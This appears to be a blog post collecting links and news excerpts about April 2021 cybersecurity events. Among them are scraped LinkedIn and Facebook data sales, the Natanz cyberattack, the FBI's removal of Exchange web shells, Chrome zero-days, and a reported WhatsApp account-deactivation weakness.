This posting is here to collect cyber security news in April 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in April 2021.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
260 Comments
Tomi Engdahl says:
Katie Canales / Insider:
Report: hackers scraped data of 500M LinkedIn users and posted it for sale online; LinkedIn confirms the dataset includes publicly viewable info from its site — – Personal data from 500 million LinkedIn users has been scraped and is reportedly for sale on a hacking forum.
Hackers scraped data from 500 million LinkedIn users — about two-thirds of the platform’s userbase — and have posted it for sale online
https://www.businessinsider.com/linkedin-data-scraped-500-million-users-for-sale-online-2021-4?op=1&scrolla=5eb6d68b7fedc32c19ef33b4&r=US&IR=T
Tomi Engdahl says:
There’s Another Facebook Phone Number Database Online
https://www.vice.com/en/article/qj8dj5/facebook-phone-number-data-breach-telegram-bot
Analysis by Motherboard and a security researcher indicate the database is separate from the recently reported cache of 500 million accounts.
An online tool lets customers pay to unmask the phone numbers of Facebook users that liked a specific Page, and the underlying dataset appears to be separate from the 500 million account database that made headlines this week, signifying another data breach or large scale scraping of Facebook users’ data, Motherboard has found.
Tomi Engdahl says:
In #LinkedIn’s case, the data is way more personal and sensitive than it was in #Facebook’s case last week.
2 scraped LinkedIn databases with 500m and 827m records sold online
https://www.hackread.com/linkedin-scraped-databases-sold-online/
Although, none of the databases contain LinkedIn users’ passwords; the data in the records is enough for cybercriminals to carry out a number of attacks including SIM Swapping, identity scams, phishing, and SMSishing, etc.
Just last week, a hacker leaked over 533 million Facebook users’ data that was collected from the social media giant using the web data scraping technique. Now, two different threat actors are selling LinkedIn data compiled as a result of data scraping as well.
It is worth noting that both databases are being sold on the same hacker forum. One of the sellers is offering 7 LinkedIn databases which, when merged together, makes 827 million users’ records. The price for all databases together is
the database with 827 million records includes the following:
Job title
Full names
Company name
Company website
Email addresses
LinkedIn profile links
Job start date
City
State
Country
Zipcode
Addresses
Fax numbers
Phone numbers
Number of connections
Second LinkedIn database
According to a sample dataset shared by CyberNews, the LinkedIn profile owners’ data leaked in this data breach includes:
Usernames
Full names
Account IDs
Email addresses
Gender details
Phone numbers
Workplace information
Social media account links.
Tomi Engdahl says:
Texas Man Tried to Blow Up the Internet
Federal Investigators allege that a Texas man wanted to use C-4 to blow up around 70% of the internet.
https://www.vice.com/en/article/93y9q3/texas-man-tried-to-blow-up-the-internet?utm_source=vicenewsfacebook
FBI agents in Texas have arrested Seth Aaron Pendley for an alleged plot to blow up an Amazon data center in Virginia with the goal of taking down the internet.
“Mr. Pendley allegedly told the undercover he planned to attack web servers that he believed provided services to the FBI, CIA, and other federal agencies,” the DOJ said in a press release. “He said he hoped to bring down ‘the oligarchy’ currently in power in the United States.”
Pendley’s plan, if it had worked, would not have knocked out around 70% of the internet. “The AWS data places are almost all centrally located,” he said, according to the criminal complaint against him. “They are fucking MASSIVE. I haven’t got all the details worked out.”
An Illustrated Field Guide To Urban Internet Infrastructure, told VICE in 2019. “Whether it actually destroyed or erased any information seems pretty unlikely because there are enough data centers—and data is distributed enough and backed up enough—that in theory that probably would not be a major concern.”
Tomi Engdahl says:
There’s Another Facebook Phone Number Database Online
Analysis by Motherboard and a security researcher indicate the database is separate from the recently reported cache of 500 million accounts.
https://www.vice.com/en/article/qj8dj5/facebook-phone-number-data-breach-telegram-bot
Tomi Engdahl says:
Cisco has stated that it does not plan to patch three different small business router models and one VPN firewall device, despite critical vulnerabilities found in each. The SOHO router models contain a bug that is rated 9.8/10 in severity, and could allow unauthenticated remote users to attack targeted equipment and gain elevated privileges. The three Cisco router models have allegedly reached end of life and will not be fixed, according to a recent statement made by Cisco.
https://www.oodaloop.com/briefs/2021/04/09/zero-day-bug-impacts-problem-plagued-cisco-soho-routers/
Tomi Engdahl says:
2 scraped LinkedIn databases with 500m and 827m records sold online
https://www.hackread.com/linkedin-scraped-databases-sold-online/
Tomi Engdahl says:
Here’s how to tell if your Facebook account was one of the half billion that were breached
https://6abc.com/facebook-breach-2021-check-data-leak-have-i-been-pwned/10495474/
Tomi Engdahl says:
Texas Man Tried to Blow Up the Internet
Federal Investigators allege that a Texas man wanted to use C-4 to blow up around 70% of the internet.
https://www.vice.com/en/article/93y9q3/texas-man-tried-to-blow-up-the-internet
Tomi Engdahl says:
https://www.techspot.com/news/89173-amd-admits-zen-3-cpus-vulnerable-new-spectre.html
Tomi Engdahl says:
Clubhouse data leak: 1.3 million user records leaked online for free
https://cybernews.com/security/clubhouse-data-leak-1-3-million-user-records-leaked-for-free-online/
So far, it seems like it’s been the worst week of the year for social media platforms in terms of data leaks, with Clubhouse seemingly joining the fray.
Days after scraped data from more than a billion Facebook and LinkedIn profiles, collectively speaking, was put for sale online, it looks like now it’s Clubhouse’s turn. The upstart platform seems to have experienced the same fate, with an SQL database containing 1.3 million Clubhouse user records leaked for free on a popular hacker forum.
https://cybernews.com/personal-data-leak-check/
Tomi Engdahl says:
https://www.durhamradionews.com/archives/136517
Tomi Engdahl says:
https://arstechnica.com/information-technology/2021/04/no-password-required-mobile-carrier-exposes-data-for-millions-of-accounts/
Tomi Engdahl says:
https://www.kyberturvallisuuskeskus.fi/fi/ajankohtaista/facebookin-vuonna-2019-varastettuja-tietoja-julkaistu-mukana-12-miljoonan-suomalaisen
Tomi Engdahl says:
A nuclear facility in Iran was hit by a “terrorist act” a day after it unveiled new advanced uranium centrifuges, a top nuclear official says. He did not say who was to blame but urged the international community to deal with nuclear terrorism. Israeli media suggest the incident was a result of an Israeli cyber attack. Last year, a fire broke out at the Natanz underground facility, which the authorities alleged was the result of cyber sabotage.
The latest incident comes as diplomatic efforts to revive a 2015 nuclear deal – abandoned by the US under the Trump administration in 2018 – have resumed.
On Saturday, Iran’s President Hassan Rouhani inaugurated new centrifuges at the Natanz site, which is key to the country’s uranium enrichment programme, in a ceremony broadcast live on television.
Iran nuclear: ‘Terrorist act’ at underground Natanz facility
https://www.bbc.com/news/world-middle-east-56708778
A nuclear facility in Iran was hit by a “terrorist act” a day after it unveiled new advanced uranium centrifuges, a top nuclear official says.
Israeli media suggest the incident was a result of an Israeli cyber attack.
Last year, a fire broke out at the Natanz underground facility, which the authorities alleged was the result of cyber sabotage.
Mr Kamalvandi did not provide further details but told Iran’s Fars news agency there there had been “no casualties or leaks”.
Later state TV read out a statement by AEOI head Ali Akbar Salehi, in which he described the incident as “sabotage” and “nuclear terrorism”.
Tomi Engdahl says:
Ellen Nakashima / Washington Post:
Sources: Biden admin to announce the nominations of ex-NSA deputy director Chris Inglis as first national cyber director and Jen Easterly as CISA head on Monday — The Biden administration plans on Monday to name a former senior National Security Agency official as the first national cyber director …
Biden administration plans to name former senior NSA officials to White House cyber position and head of CISA
https://www.washingtonpost.com/national-security/former-senior-nsa-officials-named-to-white-house-cyber-position-and-head-of-dhs-cyber-agency/2021/04/11/b9d408cc-9b2d-11eb-8005-bffc3a39f6d3_story.html
The Biden administration plans on Monday to name a former senior National Security Agency official as the first national cyber director and another former NSA official to head the Department of Homeland Security’s cybersecurity agency.
The nomination of former NSA deputy director John C. “Chris” Inglis ends months of speculation about whom the Biden administration would appoint to the White House position, and comes after bipartisan pressure from lawmakers to fill the job they created in legislation that passed in December.
The administration also plans to nominate Jen Easterly, a former NSA intelligence officer who helped stand up U.S. Cyber Command more than a decade ago, to head the Cybersecurity and Infrastructure Security Agency
Both nominees, who are highly regarded in cyber policy circles, are expected to face smooth confirmations.
The moves come as the administration is grappling with the response to two major cyber events — one a Russian cyberespionage campaign known as SolarWinds that compromised nine federal agencies and about 100 private companies, and the other a Chinese hack of Microsoft Exchange servers that hit the private sector.
Tomi Engdahl says:
CISA Releases Tool to Detect Microsoft 365 Compromise
https://www.securityweek.com/cisa-releases-tool-detect-microsoft-365-compromise
The U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has released a new tool to help with the detection of potential compromise within Microsoft Azure and Microsoft 365 environments.
Dubbed Aviary, the new tool is a dashboard that makes it easy to visualize and analyze output from Sparrow, the compromise detection tool that was released in December 2020.
Built by CISA to help with the detection of malicious activity related to SolarWinds compromise, Sparrow can be used by network defenders to hunt for potential malicious activity within Microsoft Azure Active Directory (AD), Microsoft 365 (M365), and Office 365 (O365) environments.
Aviary is a new dashboard that CISA and partners developed to help visualize and analyze outputs from its Sparrow detection tool released in December 2020. Sparrow helps network defenders detect possible compromised accounts and applications in Azure/Microsoft O365 environments.
https://github.com/cisagov/sparrow/releases
Tomi Engdahl says:
Iran Calls Natanz Atomic Site Blackout ‘Nuclear Terrorism’
https://www.securityweek.com/iran-calls-natanz-atomic-site-blackout-nuclear-terrorism
Iran on Sunday described a blackout at its underground Natanz atomic facility an act of “nuclear terrorism,” raising regional tensions as world powers and Tehran continue to negotiate over its tattered nuclear deal.
While there was no immediate claim of responsibility, suspicion fell immediately on Israel, where its media nearly uniformly reported a devastating cyberattack orchestrated by the country caused the blackout.
If Israel was responsible, it further heightens tensions between the two nations, already engaged in a shadow conflict across the wider Middle East.
Details remained few about what happened early Sunday morning at the facility, which initially was described as a blackout caused by the electrical grid feeding its above-ground workshops and underground enrichment halls.
Ali Akbar Salehi, the American-educated head of the Atomic Energy Organization of Iran, who once served as the country’s foreign minister, offered what appeared to be the harshest comments of his long career, which included the assassination of nuclear scientists a decade ago. Iran blames Israel for those killings as well.
He pledged to “seriously improve” his nation’s nuclear technology while working to lift international sanctions.
The IAEA, the United Nations’ body that monitors Tehran’s atomic program, earlier said it was aware of media reports about the incident at Natanz and had spoken with Iranian officials about it. The agency did not elaborate.
However, Natanz has been targeted by sabotage in the past. The Stuxnet computer virus, discovered in 2010 and widely believed to be a joint U.S.-Israeli creation, once disrupted and destroyed Iranian centrifuges at Natanz amid an earlier period of Western fears about Tehran’s program.
Natanz suffered a mysterious explosion at its advanced centrifuge assembly plant in July that authorities later described as sabotage. Iran now is rebuilding that facility deep inside a nearby mountain
“It’s hard for me to believe it’s a coincidence,” Yoel Guzansky, a senior fellow at Tel Aviv’s Institute for National Security Studies, said of Sunday’s blackout. “If it’s not a coincidence, and that’s a big if, someone is trying to send a message that ‘we can limit Iran’s advance and we have red lines.’”
It also sends a message that Iran’s most sensitive nuclear site is “penetrable,” he added.
Tomi Engdahl says:
Kyle Wiggers / VentureBeat:
Nvidia announces Morpheus, an AI-powered cloud-native app framework to help cybersecurity providers detect and prevent breaches in real-time, now in preview
Nvidia announces Morpheus, an AI-powered app framework for cybersecurity
https://venturebeat.com/2021/04/12/nvidia-announces-morpheus-an-ai-powered-app-framework-for-cybersecurity/
During its GTC 2021 virtual keynote this morning, Nvidia announced Morpheus, a “cloud-native” app framework aimed at providing cybersecurity partners with AI skills that can be used to detect and mitigate cybersecurity attacks. Using machine learning, Morpheus identifies, captures, and acts on threats and anomalies, including leaks of sensitive data, phishing attempts, and malware.
Morpheus is available in preview from today, and developers can apply for early access on Nvidia’s landing page.
Reflecting the pace of adoption, the AI in cybersecurity market will reach $38.2 billion in value by 2026, Markets and Markets projects. That’s up from $8.8 billion in 2019, representing a compound annual growth rate of around 23.3%. Just last week, a study from MIT Technology Review Insights and Darktrace found that 96% of execs at large enterprises are considering adopting “defensive AI” against cyberattacks.
Tomi Engdahl says:
Clubhouse data leak: 1.3 million scraped user records leaked online for free
https://cybernews.com/security/clubhouse-data-leak-1-3-million-user-records-leaked-for-free-online/
So far, it seems like it’s been the worst week of the year for social media platforms in terms of data leaks, with Clubhouse seemingly joining the fray.
Tomi Engdahl says:
Combined with the recent leak of half a billion phone numbers of FB users, this should be fun.
“A nasty new surprise for WhatsApp’s 2 billion users today, with the discovery of an alarming security risk. Using just your phone number, a remote attacker can easily deactivate WhatsApp on your phone and then stop you getting back in. Even two-factor authentication will not stop this. Here’s how the attack works…”
Sudden New Warning Will Surprise Millions Of WhatsApp Users
https://www.forbes.com/sites/zakdoffman/2021/04/10/shock-new-warning-for-millions-of-whatsapp-users-on-apple-iphone-and-google-android-phones/?sh=626604417585
This shouldn’t happen. It shouldn’t be possible. Not with a platform used by 2 billion people. Not this easily. When researchers, Luis Márquez Carpintero and Ernesto Canales Pereña, warned they could kill WhatsApp on my phone, blocking me from my own account using just my phone number, I was doubtful. But they were right.
“This is yet another worrying hack,” warns ESET’s Jake Moore, “one that could impact millions of users who could potentially be targeted with this attack. With so many people relying on WhatsApp as their primary communication tool for social and work purposes, it is alarming at what ease this can occur.”
Now, let’s start with the first weakness. Anyone can install WhatsApp on a phone and enter your number on the verification screen. You will then receive texts and calls from WhatsApp with the six-digit code. You will also see a WhatsApp app notification, telling you that a code has been requested, warning you not to share it.
So, to be very clear. WhatsApp has received an email referencing your phone number. They have no way of knowing whether this is really from you. There are no follow-up questions to confirm your ownership of the number. But an automated process has been triggered, without your knowledge, and your account will now be deactivated.
An hour or so later, and suddenly WhatsApp stops working on your phone and you see an alarming notification: “Your phone number is no longer registered with WhatsApp on this phone,” it says. “This might be because you registered it on another phone. If you didn’t do this, verify your phone number to log back into your account.” This deactivation appears to be automated, using keywords to trigger actions.
Clearly, the combination of this verification architecture, the SMS/code limits and the automated, keyword-based actions triggered by incoming emails is open to abuse. There is no sophistication to this attack—that’s the real issue here and WhatsApp should address it immediately. There are many reasons why it might be advantageous to block someone from their go-to messenger. It shouldn’t be this easy. And this should not work when 2FA is enabled, as was the case on this “victim’s” app.
According to Moore, this vulnerability has flagged another serious WhatsApp issue. “There is no way of opting out of being discovered on WhatsApp,” he warns. “Anyone can type in a phone number to locate the associated account if it exists. Ideally, a move towards being more privacy focused would help protect users from this, as well as forcing people to implement a two-step verification PIN.”
Tomi Engdahl says:
Sudden New Warning Will Surprise Millions Of WhatsApp Users
https://archive.ph/KjCb2
Tomi Engdahl says:
The bomb dot com
FBI arrest Texas man for attempting to blow up ‘the internet’ with C-4
By Katie Wickens 12 hours ago
https://www.pcgamer.com/man-tries-to-blow-up-internet/
He believed the single data center he was targeting contained “about 70 percent of the internet.”
Seth Aaron Pendley of Texas appeared in court this weekend after being apprehended by the FBI for conspiring to blow up the internet. *Checks notes* no, that is what it says. The idea was to take down an Amazon Web Services (AWS) data centre in order to free the USA from “the oligarchy” that he believes to be currently controlling his beloved country.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/joker-malware-infects-over-500-000-huawei-android-devices/
Tomi Engdahl says:
Israel appears to confirm it carried out cyberattack on Iran nuclear
facility
https://www.theguardian.com/world/2021/apr/11/israel-appears-confirm-cyberattack-iran-nuclear-facility
Israel appeared to confirm claims that it was behind a cyber-attack on
Irans main nuclear facility on Sunday, which Tehrans nuclear energy
chief described as an act of terrorism that warranted a response
against its perpetrators.
Tomi Engdahl says:
Sisä-Suomen poliisilaitoksella on tutkittavana useita
WhatsApp-sovelluksen kaappauksia
https://poliisi.fi/-/sisa-suomen-poliisilaitoksella-on-tutkittavana-useita-whatsapp-sovelluksen-kaappauksia
Useat henkilöt ovat ilmoittaneet poliisille tapauksista, joissa oma
WhatsApp-tili on kaapattu.. Selvitysten perusteella WhatsApp-tili
kaapataan siten, että tuttu yhteystieto pyytää asianomistajan
toimittamaan kiireellisesti 6-numeroisen koodin, joka lähetetään
asianomistajan puhelimeen.
Tomi Engdahl says:
Dutch supermarkets run out of cheese after ransomware attack
https://www.bleepingcomputer.com/news/security/dutch-supermarkets-run-out-of-cheese-after-ransomware-attack/
A ransomware attack against conditioned warehousing and transportation
provider Bakker Logistiek has caused a cheese shortage in Dutch
supermarkets.
Tomi Engdahl says:
Updates on Microsoft Exchange Server Vulnerabilities
https://us-cert.cisa.gov/ncas/current-activity/2021/04/12/updates-microsoft-exchange-server-vulnerabilities
CISA has added two new Malware Analysis Reports (MARs) to Alert
AA21-062A: Mitigate Microsoft Exchange Server Vulnerabilities.
Tomi Engdahl says:
IcedID Circulates Via Web Forms, Google URLs
https://threatpost.com/icedid-web-forms-google-urls/165347/
Attackers are filling out and submitting web-based contact us forms,
thus evading email spam filters.
Tomi Engdahl says:
Pulse Secure VPN users can’t login due to expired certificate
https://www.bleepingcomputer.com/news/security/pulse-secure-vpn-users-cant-login-due-to-expired-certificate/
Users worldwide cannot connect to Pulse Secure VPN devices after a
code signing certificate used to digitally sign and verify software
components has expired.
Tomi Engdahl says:
Critical security alert: If you haven’t patched this old VPN vulnerability, assume your network is compromised
https://www.zdnet.com/article/critical-security-alert-if-you-havent-patched-this-two-year-old-vpn-vulnerability-assume-your-network-is-compromised/
Hundreds of organisations that haven’t applied a Fortinet VPN security update released in 2019 should assume that cyber criminals are trying to take advantage, NCSC warns.
Tomi Engdahl says:
Brian Krebs / Krebs on Security:
Data of 21M ParkMobile customers, including emails and license plate numbers, is up for sale; ParkMobile had disclosed a cybersecurity incident on March 26 — Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America.
ParkMobile Breach Exposes License Plate Data, Mobile Numbers of 21M Users
https://krebsonsecurity.com/2021/04/parkmobile-breach-exposes-license-plate-data-mobile-numbers-of-21m-users/
Someone is selling account information for 21 million customers of ParkMobile, a mobile parking app that’s popular in North America. The stolen data includes customer email addresses, dates of birth, phone numbers, license plate numbers, hashed passwords and mailing addresses.
Asked about the sales thread, Atlanta-based ParkMobile said the company published a notification on Mar. 26 about “a cybersecurity incident linked to a vulnerability in a third-party software that we use.”
“In response, we immediately launched an investigation with the assistance of a leading cybersecurity firm to address the incident,” the notice reads. “Out of an abundance of caution, we have also notified the appropriate law enforcement authorities. The investigation is ongoing, and we are limited in the details we can provide at this time.”
The statement continues: “Our investigation indicates that no sensitive data or Payment Card Information, which we encrypt, was affected. Meanwhile, we have taken additional precautionary steps since learning of the incident, including eliminating the third-party vulnerability, maintaining our security, and continuing to monitor our systems.”
Asked for clarification on what the attackers did access, ParkMobile confirmed it included basic account information – license plate numbers, and if provided, email addresses and/or phone numbers, and vehicle nickname.
“In a small percentage of cases, there may be mailing addresses,”
ParkMobile doesn’t store user passwords, but rather it stores the output of a fairly robust one-way password hashing algorithm called bcrypt, which is far more resource-intensive and expensive to crack than common alternatives like MD5. The database stolen from ParkMobile and put up for sale includes each user’s bcrypt hash.
“You are correct that bcrypt hashed and salted passwords were obtained,” Perkins said when asked about the screenshot in the database sales thread.
“Note, we do not keep the salt values in our system,”
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/dutch-supermarkets-run-out-of-cheese-after-ransomware-attack/
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/google-chrome-microsoft-edge-zero-day-vulnerability-shared-on-twitter/
Tomi Engdahl says:
Released: April 2021 Exchange Server Security Updates
https://techcommunity.microsoft.com/t5/exchange-team-blog/released-april-2021-exchange-server-security-updates/ba-p/2254617
Vulnerabilities addressed in the April 2021 security updates were
responsibly reported to Microsoft by a security partner. Although we
are not aware of any active exploits in the wild, our recommendation
is to install these updates immediately to protect your environment.
Tomi Engdahl says:
RCE Exploit Released for Unpatched Chrome, Opera, and Brave Browsers
https://thehackernews.com/2021/04/rce-exploit-released-for-unpatched.html
An Indian security researcher has publicly published a
proof-of-concept (PoC) exploit code for a newly discovered flaw
impacting Google Chrome and other Chromium-based browsers like
Microsoft Edge, Opera, and Brave.. While Google has addressed the
issue in the latest version of V8, it’s yet to make its way to the
stable channel, thereby leaving the browsers vulnerable to attacks.
Tomi Engdahl says:
Zero-day vulnerability in Desktop Window Manager (CVE-2021-28310) used
in the wild
https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/
While analyzing the CVE-2021-1732 exploit originally discovered by the
DBAPPSecurity Threat Intelligence Center and used by the BITTER APT
group, we discovered another zero-day exploit we believe is linked to
the same actor.
Tomi Engdahl says:
CS:GO, Valve Source games vulnerable to hacking using Steam invites
https://www.bleepingcomputer.com/news/security/cs-go-valve-source-games-vulnerable-to-hacking-using-steam-invites/
A group of security researchers known as the Secret Club took to
Twitter to report a remote code execution bug in the Source 3D game
engine developed by Valve and used for building games with tens of
millions of unique players.
Tomi Engdahl says:
FBI Agents Secretly Deleted Web Shells From Hacked Microsoft Exchange Servers
https://www.securityweek.com/fbi-agents-secretly-deleted-web-shells-hacked-microsoft-exchange-servers
FBI agents executed a court-authorized cyber operation to delete malicious web shells from hundreds of previously hacked Microsoft Exchange servers in the United States, unbeknownst to their owners, the U.S. Department of Justice (DoJ) said Tuesday.
After a wave of major in-the-wild zero-day attacks against Exchange Server installations that occurred globally in January, savvy organizations scrambled to lock down vulnerable Microsoft email servers and remove web shells that were installed by attackers.
In early attacks observed by Microsoft, attackers were able to exploit a series of vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.
Unfortunately, many organizations were not able to patch systems and/or remove associated malware that was installed.
In what appears to be the first known operation of its kind, the FBI “removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.”
According to court documents, FBI agents removed the web shells by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path).
“Because the web shells the FBI removed each had a unique file path and name, they may have been more challenging for individual server owners to detect and eliminate than other web shells,” the DoJ explained.
Tomi Engdahl says:
MS Patch Tuesday: NSA Reports New Critical Exchange Flaws
https://www.securityweek.com/ms-patch-tuesday-nsa-reports-new-critical-exchange-flaws
Just weeks after a wave of major in-the-wild zero-day attacks against Exchange Server installations globally, Microsoft is raising a fresh alarm for four new critical security flaws that expose businesses to remote code execution attacks.
The four new Exchange Server vulnerabilities were fixed as part of this month’s Patch Tuesday bundle and because of the severity of these issues, Microsoft has joined with the U.S. National Security Agency (NSA) to urge the immediate deployment of the new fixes.
The NSA is credited with reporting two of the four Exchange Vulnerabilities — CVE-2021-28480 and CVE-2021-28481 – and the agency is warning that exploitation “could allow persistent access and control of enterprise networks.”
[ SEE: Microsoft Exchange Server Zero-Days Under Attack ]
The two NSA-discovered bugs carry a CVSS score of 9.8 because of the risk of pre-auth code execution attacks without user interaction. TippingPoint’s ZDI believes these bugs may be wormable between Exchange servers.
“Considering the source, and considering these bugs also receive Microsoft’s highest Exploit Index rating, assume they will eventually be exploited. Update your systems as soon as possible,” ZDI added.
Tomi Engdahl says:
PoC Exploit Released for Unpatched Flaw Affecting Chromium-Based Browsers
https://www.securityweek.com/poc-exploit-released-unpatched-flaw-affecting-chromium-based-browsers
Google Patches More Under-Attack Chome Zero-days
https://www.securityweek.com/google-patches-more-under-attack-chome-zero-days
Tomi Engdahl says:
https://www.securityweek.com/swedish-sports-body-hacked-russians-officials-say
Tomi Engdahl says:
FBI nuked web shells from hacked Exchange Servers without telling owners
https://www.bleepingcomputer.com/news/security/fbi-nuked-web-shells-from-hacked-exchange-servers-without-telling-owners/
A court-approved FBI operation was conducted to remove web shells from compromised US-based Microsoft Exchange servers without first notifying the servers’ owners.
On March 2nd, Microsoft released a series of Microsoft Exchange security updates for vulnerabilities actively exploited by a hacking group known as HAFNIUM.
vulnerabilities are collectively known as ProxyLogon and were used by threat actors in January and February to install web shells on compromised Exchange servers. These web shells provided remote access to the servers where threat actors used them to exfiltrate email and accounts credentials.
Over the following weeks, government agencies released guidance, and Microsoft released a variety of scripts and tools to help victims determine if they had been compromised and remove web shells.
Simultaneously, other threat actors began using the Microsoft Exchange vulnerabilities to install ransomware, cryptominers, and further web shells.
FBI uses search warrant to remove web shells
In a Department of Justice press release published today, the FBI states they used a search warrant to access the still-compromised Exchange servers, copy the web shell as evidence, and then remove the web shell from the server.
The FBI requested this warrant because they believed that the owners of the still-compromised web servers did not have the technical ability to remove them on their own and that the shells posed a significant risk to the victim.
Tomi Engdahl says:
The FBI is remotely hacking hundreds of computers to protect them from Hafnium
They went inside unprotected computers to remove the threat
https://www.theverge.com/2021/4/13/22382821/fbi-doj-hafnium-remote-access-removal-hack
In what’s believed to be an unprecedented move, the FBI is trying to protect hundreds of computers infected by the Hafnium hack by hacking them itself, using the original hackers’ own tools (via TechCrunch).
The hack, which affected tens of thousands of Microsoft Exchange Server customers around the world and triggered a “whole of government response” from the White House, reportedly left a number of backdoors that could let any number of hackers right into those systems again. Now, the FBI has taken advantage of this by using those same web shells / backdoors to remotely delete themselves, an operation that the agency is calling a success.
“The FBI conducted the removal by issuing a command through the web shell to the server, which was designed to cause the server to delete only the web shell (identified by its unique file path),” explains the US Justice Department.
It’ll be interesting to see if this sets a precedent for future responses to major hacks like Hafnium. While I’m personally undecided, it’s easy to argue that the FBI is doing the world a service by removing a threat like this — while Microsoft may have been painfully slow with its initial response, Microsoft Exchange Server customers have also now had well over a month to patch their own servers after several critical alerts. I wonder how many customers will be angry, and how many grateful that the FBI, not some other hacker, took advantage of the open door. We know that critical-but-local government infrastructure often has egregious security practices, most recently resulting in two local drinking water supplies being tampered with.
The FBI says that thousands of systems were patched by their owners before it began its remote Hafnium backdoor removal operation, and that it only removed “removed one early hacking group’s remaining web shells which could have been used to maintain and escalate persistent, unauthorized access to U.S. networks.”
“Today’s court-authorized removal of the malicious web shells demonstrates the Department’s commitment to disrupt hacking activity using all of our legal tools, not just prosecutions,” reads a statement from Assistant Attorney General John C. Demers, with the Justice Department’s National Security Division.
Tomi Engdahl says:
https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
Tomi Engdahl says:
Update Your Chrome Browser to Patch 2 New In-the-Wild 0-Day Exploits
https://thehackernews.com/2021/04/2-new-chrome-0-days-under-attack-update.html
Google on Tuesday released a new version of Chrome web-browsing
software for Windows, Mac, and Linux with patches for two newly
discovered security vulnerabilities for both of which it says exploits
exist in the wild, allowing attackers to engage in active
exploitation.. see also
https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/04/update-now-chrome-needs-patching-against-two-in-the-wild-exploits/
Tomi Engdahl says:
FBI blasts away web shells on US servers in wake of Exchange
vulnerabilities
https://www.zdnet.com/article/fbi-blasts-away-web-shells-on-us-servers-in-wake-of-exchange-vulnerabilities/
Feds turn into cyberfirefighters and hose down the web shell bonfire
raging on hundreds of unpatched Exchange servers.
CISA gives federal agencies until Friday to patch Exchange servers
https://www.bleepingcomputer.com/news/security/cisa-gives-federal-agencies-until-friday-to-patch-exchange-servers/
The US Cybersecurity and Infrastructure Security Agency (CISA) has
ordered federal agencies to install newly released Microsoft Exchange
security updates by Friday.
Tomi Engdahl says:
Threat Actors Targeting Cybersecurity Researchers
https://us-cert.cisa.gov/ncas/current-activity/2021/04/14/threat-actors-targeting-cybersecurity-researchers
Google and Microsoft recently published reports on advanced persistent
threat (APT) actors targeting cybersecurity researchers. The APT
actors are using fake social media profiles and legitimate-looking
websites to lure security researchers into visiting malicious websites
to steal information, including exploits and zero-day vulnerabilities.
100,000 Google Sites Used to Install SolarMarket RAT
https://threatpost.com/google-sites-solarmarket-rat/165396/
Search-engine optimization (SEO) tactics direct users searching for
common business forms such as invoices, receipts or other templates to
hacker-controlled Google-hosted domains.
Tomi Engdahl says:
An Update: The COVID-19 Vaccines Global Cold Chain Continues to Be a
Target
https://securityintelligence.com/posts/covid-19-vaccine-global-cold-chain-security/
In December 2020, IBM Security X-Force released a research blog
disclosing that the COVID-19 cold chain an integral part of
delivering and storing COVID-19 vaccines at safe temperatures was
targeted by cyber adversaries.. After that first report, we recently
discovered an additional 50 files tied to spear-phishing emails that
targeted 44 companies in 14 countries in Europe, North America, South
America, Africa and Asia.
Tomi Engdahl says:
Cyber criminals are installing cryptojacking malware on unpatched
Microsoft Exchange servers
https://www.zdnet.com/article/free-money-cyber-criminals-are-installing-cryptojacking-malware-on-unpatched-microsoft-exchange-servers/
Cyber criminals are targeting vulnerable [published in March]
Microsoft Exchange servers with cryptocurrency mining malware in a
campaign designed to secretly use the processing power of compromised
systems to make money.